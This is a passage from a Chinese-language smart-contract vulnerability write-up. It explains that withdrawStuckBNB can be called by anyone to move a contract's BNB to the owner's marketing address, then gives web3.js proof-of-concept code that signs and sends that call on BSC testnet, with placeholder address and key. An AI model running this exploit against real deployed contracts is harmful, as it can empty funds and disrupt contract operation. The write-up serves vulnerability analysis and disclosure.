255);">可以看到，updateMarketingAddress函数存在onlyOwner修饰，只有owner可以调用这个函数，这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止，攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress，但是marketingAddress本身只能由owner更新，所以攻击者无法更新marketingAddress的地址，从而无法将BNB转至攻击者的地址，但是漏洞也能造成合约内BNB的清空，影响合约运行。</span></p><p style="text-indent: 0em;"><br/></p><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">5、</strong><strong style="-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">构造POC</strong></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><br/></p><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;"><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">```javascript</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> Web3 = require(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'web3'</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// // 初始化 Web3 实例，这里使用测试网的地址，你可以根据实际情况修改</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> web3 = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">new</span> Web3(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'https://data-seed-prebsc-1-s1.binance.org:8545'</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// const web3 = new Web3('https://bsc-dataseed4.binance.org/');</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contractABI = [<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">""</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"换成完整ABI"</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">""</span>];</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contractAddress = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"0xaaaaa"</span>; <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 替换为目标合约地址</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> contract = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">new</span> web3.eth.Contract(contractABI, contractAddress);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"connect success"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 如果使用 Node.js，需要添加私钥</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> privateKey = <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'0xbbbbbbbbbbbbbb'</span>; <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 替换为你的私钥</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> account = web3.eth.accounts.privateKeyToAccount(privateKey);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">web3.eth.accounts.wallet.add(account);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">async function <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">withdrawBNB</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">()</span> </span>{</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">try</span>{</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(account.address);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> tx = {</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            from: account.address, <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 必须使用真实地址</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            to: contractAddress,</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            gas: <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(14, 156, 229)">300000</span>,</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            data: contract.methods.withdrawStuckBNB().encodeABI()</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        };</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 估算 gas</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> gas = await web3.eth.estimateGas(tx);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        tx.gas = gas;</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 获取当前 gasPrice</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> gasPrice = await web3.eth.getGasPrice();</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        tx.gasPrice = gasPrice;</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 签名并发送交易（Node.js 方式）</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> signedTx = await web3.eth.accounts.signTransaction(tx, privateKey);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'Transaction Hash:'</span>, receipt.transactionHash);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'Receipt:'</span>, receipt);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    } <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">catch</span> (error) {</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.error(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"Error:"</span>, error);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    }</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"2"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">}</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;font-size: 14px;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word 